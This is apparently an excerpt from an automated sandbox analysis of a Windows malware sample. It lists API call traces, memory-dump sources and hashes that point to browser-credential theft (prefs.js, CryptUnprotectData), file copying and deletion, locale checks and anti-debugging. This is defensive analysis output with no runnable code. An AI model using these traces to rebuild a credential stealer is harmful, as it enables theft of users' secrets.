                                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                            • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID: prefs.js
                                                            • API String ID: 3334442632-3783873740
                                                            • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                            • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                            • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                            • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                            • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                            • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                            • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                            • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                            • String ID: \*.*
                                                            • API String ID: 1415058207-1173974218
                                                            • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                            • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                            • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                            • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                            APIs
                                                            • wsprintfA.USER32 ref: 022DEFA5
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 022DEFBC
                                                            • StrCmpCA.SHLWAPI(?,00421538), ref: 022DF012
                                                            • StrCmpCA.SHLWAPI(?,0042153C), ref: 022DF028
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022DF515
                                                            • FindClose.KERNEL32(000000FF), ref: 022DF52A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextwsprintf
                                                            • String ID:
                                                            • API String ID: 180737720-0
                                                            • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                            • Instruction ID: 8e03b5e54436ad303fc0043610b15a5ff9937c8a3b00a2ba99d05578d2f60643
                                                            • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                            • Instruction Fuzzy Hash: A8E1DC729213189ADF58EBA4DD91EEE733AAF64300F8041DDA10B62195EF346BC9DF50
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                            • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                            • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                            • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID:
                                                            • API String ID: 3334442632-0
                                                            • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                            • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                            • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                            • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022DDD52
                                                            • StrCmpCA.SHLWAPI(?,004214B4), ref: 022DDD9A
                                                            • StrCmpCA.SHLWAPI(?,004214B8), ref: 022DDDB0
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022DE033
                                                            • FindClose.KERNEL32(000000FF), ref: 022DE045
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID:
                                                            • API String ID: 3334442632-0
                                                            • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                            • Instruction ID: 9941f445295ef5382ed7860858ae350d260117f63b03bba7a040d7134d76ec0a
                                                            • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                            • Instruction Fuzzy Hash: 4F9171729203049BCF14FBF4DD959FD737AAB95300F404658E80B96298EF389B189F91
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022DF985
                                                            • StrCmpCA.SHLWAPI(?,004215BC), ref: 022DF9D6
                                                            • StrCmpCA.SHLWAPI(?,004215C0), ref: 022DF9EC
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022DFD18
                                                            • FindClose.KERNEL32(000000FF), ref: 022DFD2A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                            • String ID:
                                                            • API String ID: 3334442632-0
                                                            • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                            • Instruction ID: f9fcf0aa570474f21502db070e27222cd3742d892e756a41d4cafcb42446bad5
                                                            • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                            • Instruction Fuzzy Hash: 69B13F719203189BCF24EFA4DD95EEE737AAF94300F808199E40B56698EF345B48DF91
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022D1B8A
                                                            • StrCmpCA.SHLWAPI(?,0042526C), ref: 022D1BDA
                                                            • StrCmpCA.SHLWAPI(?,00425314), ref: 022D1BF0
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022D1FA7
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022D2031
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022D2087
                                                            • FindClose.KERNEL32(000000FF), ref: 022D2099
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                            • String ID:
                                                            • API String ID: 1415058207-0
                                                            • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                            • Instruction ID: 73a9364c24afd51a29fb2c5b36399241a525cd4f94928fcb7a40d0c7100667f9
                                                            • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                            • Instruction Fuzzy Hash: 0512B971920318ABCF19EBA4DD95EFD737AAF64300F80419DA50B62198EF746B88DF50
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022DE0C5
                                                            • StrCmpCA.SHLWAPI(?,004214C8), ref: 022DE115
                                                            • StrCmpCA.SHLWAPI(?,004214CC), ref: 022DE12B
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 022DE647
                                                            • FindClose.KERNEL32(000000FF), ref: 022DE659
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2325840235-0
                                                            • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                            • Instruction ID: 440464842bfea9bd3f8c3077bc53d2126ae183129c8bf3bfc03003d384b37090
                                                            • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                            • Instruction Fuzzy Hash: D5F18E719243189ACF19EBA4DD95EEE733ABF64300F8051DEA04B62194EF346F89DE50
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                            • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                            • String ID: /
                                                            • API String ID: 3090951853-4001269591
                                                            • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                            • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                            • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                            • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C853
                                                            • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008761F0), ref: 0040C871
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                            • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                            • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                            • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                            • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1498829745-0
                                                            • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                            • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                            • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                            • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                            APIs
                                                            • memset.MSVCRT ref: 022DCABA
                                                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022DCAD8
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022DCAE3
                                                            • memcpy.MSVCRT(?,?,?), ref: 022DCB79
                                                            • lstrcat.KERNEL32(?,00420B46), ref: 022DCBAA
                                                            • lstrcat.KERNEL32(?,00420B47), ref: 022DCBBE
                                                            • lstrcat.KERNEL32(?,00420B4E), ref: 022DCBDF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1498829745-0
                                                            • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                            • Instruction ID: 7124607a6af9e312d62fabed20a90f864ab73880f9c43b6cd4e3b9e6036be3fd
                                                            • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                            • Instruction Fuzzy Hash: 9441807895421AEFDB10DFE0DC88BFEBBB9BB44304F1045A9E509A6284D7749B84CF91
                                                            APIs
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                            • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptLocalString$AllocFree
                                                            • String ID: N@
                                                            • API String ID: 4291131564-4229412743
                                                            • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                            • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                            • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                            • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022E7E48
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 022E7E60
                                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 022E7E74
                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022E7EC9
                                                            • LocalFree.KERNEL32(00000000), ref: 022E7F89
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                            • String ID:
                                                            • API String ID: 3090951853-0
                                                            • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                            • Instruction ID: 7b36b7044187fc5517709c669f925f6071b0808c46861aa294c5174f1270752c
                                                            • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                            • Instruction Fuzzy Hash: 2F414B71960218ABDF24DF94DC89BEDB3B5FB54700F5041D9E00AA6294DB742F85CFA1
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                            • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                            • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                            • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                            • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                            • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 022EBE09
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022EBE1E
                                                            • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022EBE29
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 022EBE45
                                                            • TerminateProcess.KERNEL32(00000000), ref: 022EBE4C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                            • Instruction ID: 448d301f87af9d0852dfd6569630a4753f537efff7dbbb595473ce5d966f2ee6
                                                            • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                            • Instruction Fuzzy Hash: 8F21A0BC910305DFDB14DF69F8896963BE4FB0A314F50403AE90A872A4EBB05985EF49
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
